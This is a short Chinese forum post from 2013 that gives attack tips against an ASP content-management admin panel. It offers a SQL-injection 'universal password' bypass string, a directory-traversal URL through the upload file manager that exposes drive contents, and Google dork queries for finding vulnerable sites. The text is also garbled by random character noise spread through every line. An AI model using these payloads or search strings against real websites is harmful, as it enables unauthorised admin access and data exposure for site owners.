后台万能密码 'or'='or'% h6 l9 N$ t+ m0 Q
_, o, R. R0 [' ^* ?; v后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!# B. P0 v& N$ p( E0 V+ X1 B/ Z9 k
admin/uploadfile.asp?currentFolder=/upfiles/../- o7 l& X+ u. G5 t8 Q0 ]! n
6 v* X3 k- y7 ]: s# W! Q9 a
漏洞证明:
2 I9 F% w) E3 @, ~/ k h' a, }. ^7 w9 G: i4 k
谷歌:inurl:type.asp?id=1 新闻中心% s: p0 R- j" F0 f9 ?
或者 :inurl:download_ok.asp?
/ S# S! y* B: y. g2 A! w7 |0 Y6 t# j
|
发表于 2013-3-14 20:17:32
收藏
支持
反对